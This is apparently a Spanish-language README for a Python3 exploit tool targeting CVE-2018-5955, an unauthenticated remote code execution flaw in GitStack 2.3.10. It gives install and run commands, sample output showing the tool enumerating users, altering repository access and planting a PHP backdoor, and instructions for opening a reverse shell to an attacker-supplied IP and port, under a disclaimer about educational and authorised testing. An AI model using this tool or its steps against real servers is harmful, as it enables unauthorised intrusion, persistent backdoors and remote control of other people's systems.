Un exploit para CVE-2018-5955 Gitstack 2.3.10 RCE no autenticado
Explotación: GitStack 2.3.10 Ejecución de código remoto no autorenticado
Fecha: 18.01.2018
Enlace de software: https://gitstack.com/
Exploit Autor: Kacper Szurek
Explotación original: https://www.exploit-db.com/exploits/43777
Sitio web: https://security.szurek.pl/
Categoría: remoto
CVE: CVE-2018-5955
Fecha: 23.06.2023
Nuevas características: RCE interactivo, detección del sistema operativo, función de carcasa inversa, adaptada de Python2 a Python3
CVE: CVE-2018-5955
Categoría: remoto
No me responsabilizo de sus acciones, como lo publiqué en GitHub para fines educativos o pruebas de penetración certificadas y autorizadas
Requisitos de instalación:
pip install colorama
Entonces, puedes ejecutarlo con:
python3 exploit.py
El sistema operativo se detectará después de haber explotado el CVE, de hecho habrá esta línea de salida: "[*] OS: $ OperatingSystem" (dimostración a continuación)
[+] Get user list
[+] Found user twreath
[+] Web repository already enabled
[+] Get repositories list
[+] Found repository Website
[+] Add user to repository
[+] Disable access for anyone
[+] Create backdoor in PHP
[*] Type 'shell' to get a reverse shell
[*] OS : Windows <----
También puede escribir "OS" para averiguar qué tipo de sistema operativo es
Para obtener un shell inverso real en el objetivo, puede escribir "shell" y luego escribir su IP y su puerto de escucha así:
RCE > shell
[?] Please enter the IP address for the shell: YOUR IP HERE
[?] Please enter the port number for the shell: YOUR LISTEN PORT HERE